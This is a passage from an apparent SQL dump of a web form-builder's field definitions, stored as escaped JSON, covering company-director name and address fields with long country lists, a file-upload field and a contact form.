"checked\":false},{\"text\":\"\\t\\t\\t North\",\"checked\":false},{\"text\":\"\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\",\"identify\":\"physical_home_address_of_1st_director_67334520823_20_50\"},\"type\":\"address\",\"position\":\"left_1\"}'),(8,13,'name','full_name_2nd_director_29773269723_18_53','Full Name 3rd Director','','left_4',8,'{\"id\":\"8\",\"identify\":\"full_name_2nd_director_29773269723_18_53\",\"options\":{\"label\":\"Full Name 3rd Director\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\",\"identify\":\"full_name_2nd_director_29773269723_18_53\"},\"type\":\"name\",\"position\":\"left_4\"}'),(9,13,'address','physical_home_address_of_1st_director_30978551523_15_21','Physical Home Address of 3rd Director','Please select country of citizenship if not South Africa','left_4',9,'{\"id\":\"9\",\"identify\":\"physical_home_address_of_1st_director_30978551523_15_21\",\"options\":{\"label\":\"Physical Home Address of 3rd Director\",\"instruction\":\"Please select country of citizenship if not South Africa\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\",\"checked\":false},{\"text\":\"\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\",\"checked\":false},{\"text\":\"\\t\\t\\t North\",\"checked\":false},{\"text\":\"\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\",\"identify\":\"physical_home_address_of_1st_director_30978551523_15_21\"},\"type\":\"address\",\"position\":\"left_4\"}'),(10,13,'address','address_8505540139_7_12','Physical address of the company','This can be a home address if you do have premises as yet','left_2',2,'{\"id\":\"10\",\"identify\":\"address_8505540139_7_12\",\"options\":{\"label\":\"Physical address of the company\",\"instruction\":\"This can be a home address if you do have premises as yet\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\\n\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\\n\\t\\t\\t North\",\"checked\":false},{\"text\":\"Korea,\\n\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"identify\":\"address_8505540139_7_12\",\"customClass\":\"\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\"},\"type\":\"address\",\"position\":\"left_2\"}'),(11,13,'file-upload','file_upload_2246213119_14_29','File Upload','','left_4',10,'{\"id\":\"11\",\"identify\":\"file_upload_2246213119_14_29\",\"options\":{\"label\":\"File Upload\",\"instruction\":\"\",\"required\":0,\"allowedExtensions\":\"png,jpg,gif,zip,rar,txt,doc,pdf\",\"maxSize\":\"2\",\"maxSizeUnit\":\"MB\",\"identify\":\"file_upload_2246213119_14_29\",\"customClass\":\"\"},\"type\":\"file-upload\",\"position\":\"left_4\"}'),(12,141,'name','name','Name','','left',0,'{\"identify\":\"name\",\"options\":{\"label\":\"Name\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"format\":\"Extended\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"identify\":\"name\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\"},\"type\":\"name\",\"position\":\"left\"}'),(13,141,'paragraph-text','what_is_the_best_way_to_contact_you_','What is the best way to contact you?','','left',1,'{\"identify\":\"what_is_the_best_way_to_contact_you_\",\"options\":{\"label\":\"What is the best way to contact you?\",\"instruction\":\"\",\"required\":0,\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"what_is_the_best_way_to_contact_you_\"},\"type\":\"paragraph-text\",\"position\":\"left\"}'),(14,141,'email','email','Email','','left',2,'{\"identify\":\"email\",\"options\":{\"label\":\"Email\",\"instruction\":\"\",\"required\":\"1\",\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"email\"},\"type\":\"email\",\"position\":\"left\"}'),(15,141,'website','website','Website','','left',3,'{\"identify\":\"website\",\"options\":{\"label\":\"Website\",\"instruction\":\"\",\"required\":0,\"noDuplicates\":0,\"size\":\"jsn-input-medium-fluid\",\"value\":\"http:\\/\\/\",\"identify\":\"website\"},\"type\":\"website\",\"position\":\"left\"}'),(16,141,'single-line-text','message_subject','Message Subject','','left',4,'{\"identify\":\"message_subject\",\"options\":{\"label\":\"Message Subject\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"limitType\":\"Words\",\"size\":\"jsn-input-medium-fluid\",\"value\":\"\",\"identify\":\"message_subject\"},\"type\":\"single-line-text\",\"position\":\"left\"}'),(17,141,'paragraph-text','message','Message','','left',5,'{\"identify\":\"message\",\"options\":{\"label\":\"Message\",\"instruction\":\"\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"8\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"identify\":\"message\"},\"type\":\"paragraph-text\",\"position\":\"left\"}'),(18,141,'file-upload','attached_file','Attached File','','left',6,'{\"identify\":\"attached_file\",\"options\":{\"label\":\"Attached 